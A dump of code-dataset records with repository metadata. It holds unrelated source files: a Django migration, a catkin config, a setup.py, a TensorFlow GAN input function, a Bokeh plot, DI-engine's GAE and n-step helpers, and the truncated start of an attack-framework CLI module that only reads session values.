migrations.AlterField(
model_name="productimage",
name="image",
field=versatileimagefield.fields.VersatileImageField(
upload_to="products", verbose_name="image"
),
),
migrations.AlterField(
model_name="productimage",
name="order",
field=models.PositiveIntegerField(editable=False, verbose_name="order"),
),
migrations.AlterField(
model_name="productimage",
name="ppoi",
field=versatileimagefield.fields.PPOIField(
default="0.5x0.5", editable=False, max_length=20, verbose_name="ppoi"
),
),
migrations.AlterField(
model_name="productimage",
name="product",
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="images",
to="product.Product",
verbose_name="product",
),
),
migrations.AlterField(
model_name="productvariant",
name="images",
field=models.ManyToManyField(
through="product.VariantImage",
to="product.ProductImage",
verbose_name="images",
),
),
migrations.AlterField(
model_name="variantimage",
name="image",
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="variant_images",
to="product.ProductImage",
verbose_name="image",
),
),
migrations.AlterField(
model_name="variantimage",
name="variant",
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="variant_images",
to="product.ProductVariant",
verbose_name="variant",
),
),
]
| true
| true
|
1c40ea3df699becca2e1a9f4d5908ab9016d4a01
| 2,398
|
py
|
Python
|
catkin_ws/build/cv_camera/catkin_generated/pkg.develspace.context.pc.py
|
BiggieBoo18/mr_robotarm
|
c4afb4270e8ef70b9238760584575cc9e18c8d7b
|
[
"MIT"
] | null | null | null |
catkin_ws/build/cv_camera/catkin_generated/pkg.develspace.context.pc.py
|
BiggieBoo18/mr_robotarm
|
c4afb4270e8ef70b9238760584575cc9e18c8d7b
|
[
"MIT"
] | null | null | null |
catkin_ws/build/cv_camera/catkin_generated/pkg.develspace.context.pc.py
|
BiggieBoo18/mr_robotarm
|
c4afb4270e8ef70b9238760584575cc9e18c8d7b
|
[
"MIT"
] | null | null | null |
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "C:/Users/yahoo/hack/mr_robotarm/catkin_ws/src/cv_camera/include;C:/opt/ros/melodic/x64/include;C:/opt/ros/melodic/x64/include/opencv".split(';') if "C:/Users/yahoo/hack/mr_robotarm/catkin_ws/src/cv_camera/include;C:/opt/ros/melodic/x64/include;C:/opt/ros/melodic/x64/include/opencv" != "" else []
PROJECT_CATKIN_DEPENDS = "image_transport;roscpp;cv_bridge;sensor_msgs;nodelet;camera_info_manager".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "-lcv_camera;C:/opt/ros/melodic/x64/lib/opencv_calib3d341.lib;C:/opt/ros/melodic/x64/lib/opencv_core341.lib;C:/opt/ros/melodic/x64/lib/opencv_dnn341.lib;C:/opt/ros/melodic/x64/lib/opencv_features2d341.lib;C:/opt/ros/melodic/x64/lib/opencv_flann341.lib;C:/opt/ros/melodic/x64/lib/opencv_highgui341.lib;C:/opt/ros/melodic/x64/lib/opencv_imgcodecs341.lib;C:/opt/ros/melodic/x64/lib/opencv_imgproc341.lib;C:/opt/ros/melodic/x64/lib/opencv_ml341.lib;C:/opt/ros/melodic/x64/lib/opencv_objdetect341.lib;C:/opt/ros/melodic/x64/lib/opencv_photo341.lib;C:/opt/ros/melodic/x64/lib/opencv_shape341.lib;C:/opt/ros/melodic/x64/lib/opencv_stitching341.lib;C:/opt/ros/melodic/x64/lib/opencv_superres341.lib;C:/opt/ros/melodic/x64/lib/opencv_video341.lib;C:/opt/ros/melodic/x64/lib/opencv_videoio341.lib;C:/opt/ros/melodic/x64/lib/opencv_videostab341.lib".split(';') if "-lcv_camera;C:/opt/ros/melodic/x64/lib/opencv_calib3d341.lib;C:/opt/ros/melodic/x64/lib/opencv_core341.lib;C:/opt/ros/melodic/x64/lib/opencv_dnn341.lib;C:/opt/ros/melodic/x64/lib/opencv_features2d341.lib;C:/opt/ros/melodic/x64/lib/opencv_flann341.lib;C:/opt/ros/melodic/x64/lib/opencv_highgui341.lib;C:/opt/ros/melodic/x64/lib/opencv_imgcodecs341.lib;C:/opt/ros/melodic/x64/lib/opencv_imgproc341.lib;C:/opt/ros/melodic/x64/lib/opencv_ml341.lib;C:/opt/ros/melodic/x64/lib/opencv_objdetect341.lib;C:/opt/ros/melodic/x64/lib/opencv_photo341.lib;C:/opt/ros/melodic/x64/lib/opencv_shape341.lib;C:/opt/ros/melodic/x64/lib/opencv_stitching341.lib;C:/opt/ros/melodic/x64/lib/opencv_superres341.lib;C:/opt/ros/melodic/x64/lib/opencv_video341.lib;C:/opt/ros/melodic/x64/lib/opencv_videoio341.lib;C:/opt/ros/melodic/x64/lib/opencv_videostab341.lib" != "" else []
PROJECT_NAME = "cv_camera"
PROJECT_SPACE_DIR = "C:/Users/yahoo/hack/mr_robotarm/catkin_ws/devel"
PROJECT_VERSION = "0.5.0"
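The generated `.split(';') if ... else []` pattern exists because `''.split(';')` returns `['']` rather than an empty list. The same idiom, distilled into a small helper (names are illustrative, not part of the generated file):

def split_or_empty(value, sep=';'):
    # ''.split(';') yields [''], so map empty input to [] instead.
    return value.split(sep) if value != "" else []

assert split_or_empty("") == []
assert split_or_empty("a;b") == ["a", "b"]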
| 266.444444
| 1,740
| 0.802335
|
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "C:/Users/yahoo/hack/mr_robotarm/catkin_ws/src/cv_camera/include;C:/opt/ros/melodic/x64/include;C:/opt/ros/melodic/x64/include/opencv".split(';') if "C:/Users/yahoo/hack/mr_robotarm/catkin_ws/src/cv_camera/include;C:/opt/ros/melodic/x64/include;C:/opt/ros/melodic/x64/include/opencv" != "" else []
PROJECT_CATKIN_DEPENDS = "image_transport;roscpp;cv_bridge;sensor_msgs;nodelet;camera_info_manager".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "-lcv_camera;C:/opt/ros/melodic/x64/lib/opencv_calib3d341.lib;C:/opt/ros/melodic/x64/lib/opencv_core341.lib;C:/opt/ros/melodic/x64/lib/opencv_dnn341.lib;C:/opt/ros/melodic/x64/lib/opencv_features2d341.lib;C:/opt/ros/melodic/x64/lib/opencv_flann341.lib;C:/opt/ros/melodic/x64/lib/opencv_highgui341.lib;C:/opt/ros/melodic/x64/lib/opencv_imgcodecs341.lib;C:/opt/ros/melodic/x64/lib/opencv_imgproc341.lib;C:/opt/ros/melodic/x64/lib/opencv_ml341.lib;C:/opt/ros/melodic/x64/lib/opencv_objdetect341.lib;C:/opt/ros/melodic/x64/lib/opencv_photo341.lib;C:/opt/ros/melodic/x64/lib/opencv_shape341.lib;C:/opt/ros/melodic/x64/lib/opencv_stitching341.lib;C:/opt/ros/melodic/x64/lib/opencv_superres341.lib;C:/opt/ros/melodic/x64/lib/opencv_video341.lib;C:/opt/ros/melodic/x64/lib/opencv_videoio341.lib;C:/opt/ros/melodic/x64/lib/opencv_videostab341.lib".split(';') if "-lcv_camera;C:/opt/ros/melodic/x64/lib/opencv_calib3d341.lib;C:/opt/ros/melodic/x64/lib/opencv_core341.lib;C:/opt/ros/melodic/x64/lib/opencv_dnn341.lib;C:/opt/ros/melodic/x64/lib/opencv_features2d341.lib;C:/opt/ros/melodic/x64/lib/opencv_flann341.lib;C:/opt/ros/melodic/x64/lib/opencv_highgui341.lib;C:/opt/ros/melodic/x64/lib/opencv_imgcodecs341.lib;C:/opt/ros/melodic/x64/lib/opencv_imgproc341.lib;C:/opt/ros/melodic/x64/lib/opencv_ml341.lib;C:/opt/ros/melodic/x64/lib/opencv_objdetect341.lib;C:/opt/ros/melodic/x64/lib/opencv_photo341.lib;C:/opt/ros/melodic/x64/lib/opencv_shape341.lib;C:/opt/ros/melodic/x64/lib/opencv_stitching341.lib;C:/opt/ros/melodic/x64/lib/opencv_superres341.lib;C:/opt/ros/melodic/x64/lib/opencv_video341.lib;C:/opt/ros/melodic/x64/lib/opencv_videoio341.lib;C:/opt/ros/melodic/x64/lib/opencv_videostab341.lib" != "" else []
PROJECT_NAME = "cv_camera"
PROJECT_SPACE_DIR = "C:/Users/yahoo/hack/mr_robotarm/catkin_ws/devel"
PROJECT_VERSION = "0.5.0"
| true
| true
|
1c40ea8a1ea02e403128b1f2ac60d944b4f261f9
| 472
|
py
|
Python
|
setup.py
|
GoPreki/xlrd-layer
|
a6f172debe304c69fad7f69c619896d4d0ef0157
|
[
"MIT"
] | null | null | null |
setup.py
|
GoPreki/xlrd-layer
|
a6f172debe304c69fad7f69c619896d4d0ef0157
|
[
"MIT"
] | null | null | null |
setup.py
|
GoPreki/xlrd-layer
|
a6f172debe304c69fad7f69c619896d4d0ef0157
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
from distutils.core import setup
setup(
name="xlrd-layer",
version="1.0.0",
author="Preki",
author_email="ramos@gopreki.com",
packages=['xlrd_layer'],
url='https://gopreki.com',
download_url="https://github.com/GoPreki/xlrd-layer",
license="MIT",
description="Python library for Preki xlsx reading process",
long_description="Python library for Preki xlsx reading process",
install_requires=["xlrd"],
)
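Since the layer only bundles xlrd, consuming code reads workbooks with the stock xlrd API; a hedged sketch (the file name is hypothetical, and note that xlrd 2.x only reads legacy .xls files, so an xlsx workflow implies xlrd < 2.0):

import xlrd  # provided via install_requires

book = xlrd.open_workbook("orders.xls")  # hypothetical input file
sheet = book.sheet_by_index(0)
print(sheet.row_values(0))               # values of the first row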
| 26.222222
| 69
| 0.684322
|
from distutils.core import setup
setup(
name="xlrd-layer",
version="1.0.0",
author="Preki",
author_email="ramos@gopreki.com",
packages=['xlrd_layer'],
url='https://gopreki.com',
download_url="https://github.com/GoPreki/xlrd-layer",
license="MIT",
description="Python library for Preki xlsx reading process",
long_description="Python library for Preki xlsx reading process",
install_requires=["xlrd"],
)
| true
| true
|
1c40ec6bc7f7a08df1164f18f3642a58ac7ae014
| 1,042
|
py
|
Python
|
dist_input.py
|
omidsakhi/tpu_dist_gan
|
c676540dcd7c9fc8eb3e01bb976ed6655e1c906d
|
[
"Apache-2.0"
] | 1
|
2019-12-09T04:45:33.000Z
|
2019-12-09T04:45:33.000Z
|
dist_input.py
|
omidsakhi/tpu_dist_gan
|
c676540dcd7c9fc8eb3e01bb976ed6655e1c906d
|
[
"Apache-2.0"
] | null | null | null |
dist_input.py
|
omidsakhi/tpu_dist_gan
|
c676540dcd7c9fc8eb3e01bb976ed6655e1c906d
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
import math
class InputFunction(object):
def __init__(self, noise_dim):
self.noise_dim = noise_dim
def points_on_circle(self, num, r):
        pi = math.pi  # use the math constant rather than a truncated literal
coords = [ (r * math.cos((2. / num) * i * pi) , r * math.sin((2. / num) * i * pi) ) for i in range(num)]
return coords
def __call__(self, params):
batch_size = params['batch_size']
random_noise = tf.random_normal([batch_size, self.noise_dim])
dist = tf.contrib.distributions # pylint: disable=E1101
p = self.points_on_circle(8, 2.)
gauss = dist.Mixture(
            cat=dist.Categorical(probs=[1. / 8 for _ in range(8)]),  # uniform weights; the original 0.25s summed to 2
components=[
dist.MultivariateNormalDiag(loc=p[i], scale_diag=[0.02, 0.02]) for i in range(8)
])
samples = gauss.sample([batch_size])
features = {
'samples': samples,
'random_noise': random_noise}
return features
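A hedged usage sketch under TF1 graph semantics (the noise dimension and batch size are illustrative; requires a TF1 build with tf.contrib available):

# Hypothetical driver code for the input function above.
input_fn = InputFunction(noise_dim=64)
features = input_fn({'batch_size': 16})
with tf.Session() as sess:
    samples, noise = sess.run([features['samples'], features['random_noise']])
    print(samples.shape, noise.shape)  # expected: (16, 2) (16, 64)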
| 28.944444
| 109
| 0.65739
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
import math
class InputFunction(object):
def __init__(self, noise_dim):
self.noise_dim = noise_dim
def points_on_circle(self, num, r):
        pi = math.pi
coords = [ (r * math.cos((2. / num) * i * pi) , r * math.sin((2. / num) * i * pi) ) for i in range(num)]
return coords
def __call__(self, params):
batch_size = params['batch_size']
random_noise = tf.random_normal([batch_size, self.noise_dim])
dist = tf.contrib.distributions
p = self.points_on_circle(8, 2.)
gauss = dist.Mixture(
            cat=dist.Categorical(probs=[1. / 8 for _ in range(8)]),
components=[
dist.MultivariateNormalDiag(loc=p[i], scale_diag=[0.02, 0.02]) for i in range(8)
])
samples = gauss.sample([batch_size])
features = {
'samples': samples,
'random_noise': random_noise}
return features
| true
| true
|
1c40ed0b3aa037a17466cfff094defcdad7bafa7
| 677
|
py
|
Python
|
examples/plotting/file/jitter.py
|
kevin1kevin1k/bokeh
|
9f34b5b710e2748ec803c12918ec1706098a3477
|
[
"BSD-3-Clause"
] | 17
|
2020-06-14T03:47:35.000Z
|
2022-03-07T00:25:23.000Z
|
examples/plotting/file/jitter.py
|
kevin1kevin1k/bokeh
|
9f34b5b710e2748ec803c12918ec1706098a3477
|
[
"BSD-3-Clause"
] | 12
|
2020-07-22T22:40:09.000Z
|
2021-03-17T14:10:27.000Z
|
examples/plotting/file/jitter.py
|
kevin1kevin1k/bokeh
|
9f34b5b710e2748ec803c12918ec1706098a3477
|
[
"BSD-3-Clause"
] | 8
|
2020-06-14T03:47:23.000Z
|
2021-11-20T15:14:04.000Z
|
from bokeh.layouts import column
from bokeh.plotting import figure, show, output_file
from bokeh.sampledata.autompg import autompg
from bokeh.transform import jitter
years = sorted(autompg.yr.unique())
p1 = figure(plot_width=600, plot_height=300, title="Years vs mpg without jittering")
p1.xgrid.grid_line_color = None
p1.xaxis[0].ticker = years
p1.circle(x='yr', y='mpg', size=9, alpha=0.4, source=autompg)
p2 = figure(plot_width=600, plot_height=300, title="Years vs mpg with jittering")
p2.xgrid.grid_line_color = None
p2.xaxis[0].ticker = years
p2.circle(x=jitter('yr', 0.4), y='mpg', size=9, alpha=0.4, source=autompg)
output_file("jitter.html")
show(column(p1, p2))
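The jitter transform also takes a distribution argument; a hedged variant of the second plot using normally distributed offsets instead of the default uniform ones:

# Optional variant (not in the original example): normal jitter.
p3 = figure(plot_width=600, plot_height=300, title="Years vs mpg with normal jitter")
p3.xgrid.grid_line_color = None
p3.xaxis[0].ticker = years
p3.circle(x=jitter('yr', width=0.4, distribution="normal"),
          y='mpg', size=9, alpha=0.4, source=autompg)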
| 32.238095
| 84
| 0.751846
|
from bokeh.layouts import column
from bokeh.plotting import figure, show, output_file
from bokeh.sampledata.autompg import autompg
from bokeh.transform import jitter
years = sorted(autompg.yr.unique())
p1 = figure(plot_width=600, plot_height=300, title="Years vs mpg without jittering")
p1.xgrid.grid_line_color = None
p1.xaxis[0].ticker = years
p1.circle(x='yr', y='mpg', size=9, alpha=0.4, source=autompg)
p2 = figure(plot_width=600, plot_height=300, title="Years vs mpg with jittering")
p2.xgrid.grid_line_color = None
p2.xaxis[0].ticker = years
p2.circle(x=jitter('yr', 0.4), y='mpg', size=9, alpha=0.4, source=autompg)
output_file("jitter.html")
show(column(p1, p2))
| true
| true
|
1c40edab30a942e4d0f8d373e55273ab7795c9e2
| 10,867
|
py
|
Python
|
ding/rl_utils/adder.py
|
jayyoung0802/DI-engine
|
efbb35ddaf184d1009291e6842fbbae09f193492
|
[
"Apache-2.0"
] | null | null | null |
ding/rl_utils/adder.py
|
jayyoung0802/DI-engine
|
efbb35ddaf184d1009291e6842fbbae09f193492
|
[
"Apache-2.0"
] | null | null | null |
ding/rl_utils/adder.py
|
jayyoung0802/DI-engine
|
efbb35ddaf184d1009291e6842fbbae09f193492
|
[
"Apache-2.0"
] | null | null | null |
from typing import List, Dict, Any, Optional
from collections import deque
import copy
import torch
from ding.utils import list_split, lists_to_dicts
from .gae import gae, gae_data
class Adder(object):
"""
Overview:
        Adder is a component that handles different transformations and calculations for transitions
        in the Collector module (data generation and processing), such as GAE, n-step return and transition sampling.
Interface:
__init__, get_gae, get_gae_with_default_last_value, get_nstep_return_data, get_train_sample
"""
@classmethod
def get_gae(cls, data: List[Dict[str, Any]], last_value: torch.Tensor, gamma: float, gae_lambda: float,
cuda: bool) -> List[Dict[str, Any]]:
"""
Overview:
Get GAE advantage for stacked transitions(T timestep, 1 batch). Call ``gae`` for calculation.
Arguments:
- data (:obj:`list`): Transitions list, each element is a transition dict with at least ['value', 'reward']
- last_value (:obj:`torch.Tensor`): The last value(i.e.: the T+1 timestep)
- gamma (:obj:`float`): The future discount factor
- gae_lambda (:obj:`float`): GAE lambda parameter
- cuda (:obj:`bool`): Whether use cuda in GAE computation
Returns:
- data (:obj:`list`): transitions list like input one, but each element owns extra advantage key 'adv'
"""
value = torch.stack([d['value'] for d in data])
if last_value.shape[0] == 1:
next_value = torch.stack([d['value'] for d in data][1:] + [last_value])
else:
            next_value = last_value  # pass the whole next_value, not only the value at the last timestep
traj_flag = torch.stack([torch.tensor(int(d['traj_flag'])) for d in data])
reward = torch.stack([d['reward'] for d in data])
if cuda:
value = value.cuda()
next_value = next_value.cuda()
reward = reward.cuda()
if last_value.shape[0] == 1:
adv = gae(gae_data(value, next_value, reward, None, None), gamma, gae_lambda)
else:
            # done is None; done-ness is inferred from next_value:
            # if next_value is zero it is a real done, otherwise it is not
adv = gae(gae_data(value, next_value, reward, None, traj_flag), gamma, gae_lambda)
if cuda:
adv = adv.cpu()
for i in range(len(data)):
data[i]['adv'] = adv[i]
return data
@classmethod
def get_gae_with_default_last_value(cls, data: deque, done: bool, gamma: float, gae_lambda: float,
cuda: bool) -> List[Dict[str, Any]]:
"""
Overview:
            Like ``get_gae`` above, get GAE advantage for stacked transitions. However, this function is designed
            for the case where ``last_value`` is not passed. If the transition is not done yet, it would assign the
            last value in ``data`` as ``last_value``, discard the last element in ``data`` (i.e. len(data) would
            decrease by 1), and then call ``get_gae``. Otherwise it would set ``last_value`` to 0.
Arguments:
- data (:obj:`deque`): Transitions list, each element is a transition dict with \
at least['value', 'reward']
- done (:obj:`bool`): Whether the transition reaches the end of an episode(i.e. whether the env is done)
- gamma (:obj:`float`): The future discount factor
- gae_lambda (:obj:`float`): GAE lambda parameter
- cuda (:obj:`bool`): Whether use cuda in GAE computation
Returns:
- data (:obj:`List[Dict[str, Any]]`): transitions list like input one, but each element owns \
extra advantage key 'adv'
"""
if done:
last_value = torch.zeros_like(data[-1]['value'])
else:
last_data = data.pop()
last_value = last_data['value']
return cls.get_gae(data, last_value, gamma, gae_lambda, cuda)
@classmethod
def get_nstep_return_data(
cls,
data: deque,
nstep: int,
cum_reward=False,
correct_terminate_gamma=True,
gamma=0.99,
) -> deque:
"""
Overview:
Process raw traj data by updating keys ['next_obs', 'reward', 'done'] in data's dict element.
Arguments:
- data (:obj:`deque`): Transitions list, each element is a transition dict
            - nstep (:obj:`int`): Number of steps. If it equals 1, ``data`` is returned directly; \
                otherwise the keys are updated with their n-step values.
Returns:
- data (:obj:`deque`): Transitions list like input one, but each element updated with nstep value.
"""
if nstep == 1:
return data
fake_reward = torch.zeros(1)
next_obs_flag = 'next_obs' in data[0]
for i in range(len(data) - nstep):
# update keys ['next_obs', 'reward', 'done'] with their n-step value
if next_obs_flag:
data[i]['next_obs'] = data[i + nstep]['obs'] # do not need deepcopy
if cum_reward:
data[i]['reward'] = sum([data[i + j]['reward'] * (gamma ** j) for j in range(nstep)])
else:
data[i]['reward'] = torch.cat([data[i + j]['reward'] for j in range(nstep)])
data[i]['done'] = data[i + nstep - 1]['done']
if correct_terminate_gamma:
data[i]['value_gamma'] = gamma ** nstep
for i in range(max(0, len(data) - nstep), len(data)):
if next_obs_flag:
data[i]['next_obs'] = data[-1]['next_obs'] # do not need deepcopy
if cum_reward:
data[i]['reward'] = sum([data[i + j]['reward'] * (gamma ** j) for j in range(len(data) - i)])
else:
data[i]['reward'] = torch.cat(
[data[i + j]['reward']
for j in range(len(data) - i)] + [fake_reward for _ in range(nstep - (len(data) - i))]
)
data[i]['done'] = data[-1]['done']
if correct_terminate_gamma:
data[i]['value_gamma'] = gamma ** (len(data) - i - 1)
return data
@classmethod
def get_train_sample(
cls,
data: List[Dict[str, Any]],
unroll_len: int,
last_fn_type: str = 'last',
null_transition: Optional[dict] = None
) -> List[Dict[str, Any]]:
"""
Overview:
            Process raw trajectory data into training samples of length ``unroll_len``.
            If ``unroll_len`` equals 1, no processing is needed and ``data`` can be returned directly.
            Otherwise, ``data`` is split according to ``unroll_len``, the residual part is processed according to
            ``last_fn_type``, and ``lists_to_dicts`` is called to form the sampled training data.
Arguments:
- data (:obj:`List[Dict[str, Any]]`): Transitions list, each element is a transition dict
- unroll_len (:obj:`int`): Learn training unroll length
- last_fn_type (:obj:`str`): The method type name for dealing with last residual data in a traj \
after splitting, should be in ['last', 'drop', 'null_padding']
- null_transition (:obj:`Optional[dict]`): Dict type null transition, used in ``null_padding``
Returns:
- data (:obj:`List[Dict[str, Any]]`): Transitions list processed after unrolling
"""
if unroll_len == 1:
return data
else:
# cut data into pieces whose length is unroll_len
split_data, residual = list_split(data, step=unroll_len)
def null_padding():
template = copy.deepcopy(residual[0])
template['null'] = True
if isinstance(template['obs'], dict):
template['obs'] = {k: torch.zeros_like(v) for k, v in template['obs'].items()}
else:
template['obs'] = torch.zeros_like(template['obs'])
# template['action'] = -1 * torch.ones_like(template['action']) # TODO(pu)
template['action'] = torch.zeros_like(template['action'])
template['done'] = True
template['reward'] = torch.zeros_like(template['reward'])
if 'value_gamma' in template:
template['value_gamma'] = 0.
null_data = [cls._get_null_transition(template, null_transition) for _ in range(miss_num)]
return null_data
if residual is not None:
miss_num = unroll_len - len(residual)
if last_fn_type == 'drop':
# drop the residual part
pass
elif last_fn_type == 'last':
if len(split_data) > 0:
                        # copy the last entries from split_data's last element, and insert them in front of residual
last_data = copy.deepcopy(split_data[-1][-miss_num:])
split_data.append(last_data + residual)
else:
# get null transitions using ``null_padding``, and insert behind residual
null_data = null_padding()
split_data.append(residual + null_data)
elif last_fn_type == 'null_padding':
# same to the case of 'last' type and split_data is empty
null_data = null_padding()
split_data.append(residual + null_data)
# collate unroll_len dicts according to keys
if len(split_data) > 0:
split_data = [lists_to_dicts(d, recursive=True) for d in split_data]
return split_data
@classmethod
def _get_null_transition(cls, template: dict, null_transition: Optional[dict] = None) -> dict:
"""
Overview:
Get null transition for padding. If ``cls._null_transition`` is None, return input ``template`` instead.
Arguments:
- template (:obj:`dict`): The template for null transition.
- null_transition (:obj:`Optional[dict]`): Dict type null transition, used in ``null_padding``
Returns:
- null_transition (:obj:`dict`): The deepcopied null transition.
"""
if null_transition is not None:
return copy.deepcopy(null_transition)
else:
return copy.deepcopy(template)
get_gae = Adder.get_gae
get_gae_with_default_last_value = Adder.get_gae_with_default_last_value
get_nstep_return_data = Adder.get_nstep_return_data
get_train_sample = Adder.get_train_sample
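A toy example of the n-step helper on a two-step trajectory; the tensors are illustrative, and the trajectory is deliberately too short for the non-terminal branch, so both transitions fall into the tail-handling loop:

# Illustrative only: two fake transitions with 1-element reward tensors.
traj = [
    {'obs': torch.zeros(4), 'next_obs': torch.ones(4),
     'reward': torch.tensor([1.0]), 'done': False},
    {'obs': torch.ones(4), 'next_obs': 2 * torch.ones(4),
     'reward': torch.tensor([2.0]), 'done': True},
]
out = get_nstep_return_data(traj, nstep=2, gamma=0.99)
print(out[0]['reward'])  # tensor([1., 2.]) - per-step rewards concatenated
print(out[1]['reward'])  # tensor([2., 0.]) - padded with a fake zero reward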
| 48.95045
| 119
| 0.570167
|
from typing import List, Dict, Any, Optional
from collections import deque
import copy
import torch
from ding.utils import list_split, lists_to_dicts
from .gae import gae, gae_data
class Adder(object):
@classmethod
def get_gae(cls, data: List[Dict[str, Any]], last_value: torch.Tensor, gamma: float, gae_lambda: float,
cuda: bool) -> List[Dict[str, Any]]:
value = torch.stack([d['value'] for d in data])
if last_value.shape[0] == 1:
next_value = torch.stack([d['value'] for d in data][1:] + [last_value])
else:
next_value = last_value
traj_flag = torch.stack([torch.tensor(int(d['traj_flag'])) for d in data])
reward = torch.stack([d['reward'] for d in data])
if cuda:
value = value.cuda()
next_value = next_value.cuda()
reward = reward.cuda()
if last_value.shape[0] == 1:
adv = gae(gae_data(value, next_value, reward, None, None), gamma, gae_lambda)
else:
adv = gae(gae_data(value, next_value, reward, None, traj_flag), gamma, gae_lambda)
if cuda:
adv = adv.cpu()
for i in range(len(data)):
data[i]['adv'] = adv[i]
return data
@classmethod
def get_gae_with_default_last_value(cls, data: deque, done: bool, gamma: float, gae_lambda: float,
cuda: bool) -> List[Dict[str, Any]]:
if done:
last_value = torch.zeros_like(data[-1]['value'])
else:
last_data = data.pop()
last_value = last_data['value']
return cls.get_gae(data, last_value, gamma, gae_lambda, cuda)
@classmethod
def get_nstep_return_data(
cls,
data: deque,
nstep: int,
cum_reward=False,
correct_terminate_gamma=True,
gamma=0.99,
) -> deque:
if nstep == 1:
return data
fake_reward = torch.zeros(1)
next_obs_flag = 'next_obs' in data[0]
for i in range(len(data) - nstep):
if next_obs_flag:
data[i]['next_obs'] = data[i + nstep]['obs']
if cum_reward:
data[i]['reward'] = sum([data[i + j]['reward'] * (gamma ** j) for j in range(nstep)])
else:
data[i]['reward'] = torch.cat([data[i + j]['reward'] for j in range(nstep)])
data[i]['done'] = data[i + nstep - 1]['done']
if correct_terminate_gamma:
data[i]['value_gamma'] = gamma ** nstep
for i in range(max(0, len(data) - nstep), len(data)):
if next_obs_flag:
data[i]['next_obs'] = data[-1]['next_obs']
if cum_reward:
data[i]['reward'] = sum([data[i + j]['reward'] * (gamma ** j) for j in range(len(data) - i)])
else:
data[i]['reward'] = torch.cat(
[data[i + j]['reward']
for j in range(len(data) - i)] + [fake_reward for _ in range(nstep - (len(data) - i))]
)
data[i]['done'] = data[-1]['done']
if correct_terminate_gamma:
data[i]['value_gamma'] = gamma ** (len(data) - i - 1)
return data
@classmethod
def get_train_sample(
cls,
data: List[Dict[str, Any]],
unroll_len: int,
last_fn_type: str = 'last',
null_transition: Optional[dict] = None
) -> List[Dict[str, Any]]:
if unroll_len == 1:
return data
else:
split_data, residual = list_split(data, step=unroll_len)
def null_padding():
template = copy.deepcopy(residual[0])
template['null'] = True
if isinstance(template['obs'], dict):
template['obs'] = {k: torch.zeros_like(v) for k, v in template['obs'].items()}
else:
template['obs'] = torch.zeros_like(template['obs'])
template['action'] = torch.zeros_like(template['action'])
template['done'] = True
template['reward'] = torch.zeros_like(template['reward'])
if 'value_gamma' in template:
template['value_gamma'] = 0.
null_data = [cls._get_null_transition(template, null_transition) for _ in range(miss_num)]
return null_data
if residual is not None:
miss_num = unroll_len - len(residual)
if last_fn_type == 'drop':
pass
elif last_fn_type == 'last':
if len(split_data) > 0:
last_data = copy.deepcopy(split_data[-1][-miss_num:])
split_data.append(last_data + residual)
else:
# get null transitions using ``null_padding``, and insert behind residual
null_data = null_padding()
split_data.append(residual + null_data)
elif last_fn_type == 'null_padding':
# same to the case of 'last' type and split_data is empty
null_data = null_padding()
split_data.append(residual + null_data)
# collate unroll_len dicts according to keys
if len(split_data) > 0:
split_data = [lists_to_dicts(d, recursive=True) for d in split_data]
return split_data
@classmethod
def _get_null_transition(cls, template: dict, null_transition: Optional[dict] = None) -> dict:
if null_transition is not None:
return copy.deepcopy(null_transition)
else:
return copy.deepcopy(template)
get_gae = Adder.get_gae
get_gae_with_default_last_value = Adder.get_gae_with_default_last_value
get_nstep_return_data = Adder.get_nstep_return_data
get_train_sample = Adder.get_train_sample
| true
| true
|
1c40ee00c39d0b6c3a52855b04fcd56ef6764b7a
| 598
|
py
|
Python
|
front/migrations/__init__.py
|
llazzaro/django-front
|
8a04a88d42b37f4882ab43415e5f20bedae9d257
|
[
"MIT"
] | 135
|
2015-01-12T22:21:41.000Z
|
2021-12-12T03:52:04.000Z
|
front/migrations/__init__.py
|
P-Designs/django-front
|
2f7daaa70d6b2210f4a4ad0c251b0893f15bd711
|
[
"MIT"
] | 12
|
2015-04-10T12:45:04.000Z
|
2020-03-22T17:32:32.000Z
|
front/migrations/__init__.py
|
P-Designs/django-front
|
2f7daaa70d6b2210f4a4ad0c251b0893f15bd711
|
[
"MIT"
] | 24
|
2015-01-24T01:22:18.000Z
|
2022-03-15T13:06:47.000Z
|
"""
Django migrations for django-front app
This package does not contain South migrations. South migrations can be found
in the ``south_migrations`` package.
"""
SOUTH_ERROR_MESSAGE = """\n
For South support, customize the SOUTH_MIGRATION_MODULES setting like so:
SOUTH_MIGRATION_MODULES = {
'front': 'front.south_migrations',
}
"""
# Ensure the user is not using Django 1.6 or below with South
try:
from django.db import migrations # noqa
except ImportError:
from django.core.exceptions import ImproperlyConfigured
raise ImproperlyConfigured(SOUTH_ERROR_MESSAGE)
| 27.181818
| 78
| 0.754181
|
SOUTH_ERROR_MESSAGE = """\n
For South support, customize the SOUTH_MIGRATION_MODULES setting like so:
SOUTH_MIGRATION_MODULES = {
'front': 'front.south_migrations',
}
"""
try:
from django.db import migrations
except ImportError:
from django.core.exceptions import ImproperlyConfigured
raise ImproperlyConfigured(SOUTH_ERROR_MESSAGE)
| true
| true
|
1c40eee28f9b90e96355b7775b84c6b9d38efa2a
| 401
|
py
|
Python
|
modules/execute_attack.py
|
mica-framework/cli
|
a5a851a73d7b9bd0431e9c8bb0c8fca401b32ccf
|
[
"MIT"
] | 5
|
2019-06-14T12:32:56.000Z
|
2022-03-17T20:55:48.000Z
|
modules/execute_attack.py
|
mica-framework/cli
|
a5a851a73d7b9bd0431e9c8bb0c8fca401b32ccf
|
[
"MIT"
] | null | null | null |
modules/execute_attack.py
|
mica-framework/cli
|
a5a851a73d7b9bd0431e9c8bb0c8fca401b32ccf
|
[
"MIT"
] | null | null | null |
import server
from core import SessionStorage
def execute(*args):
# get the session storage
sessionStorage = args[0]
# get the attack information
attack_type = sessionStorage.get_value('list_attacks')
victims = sessionStorage.get_value('list_victims')
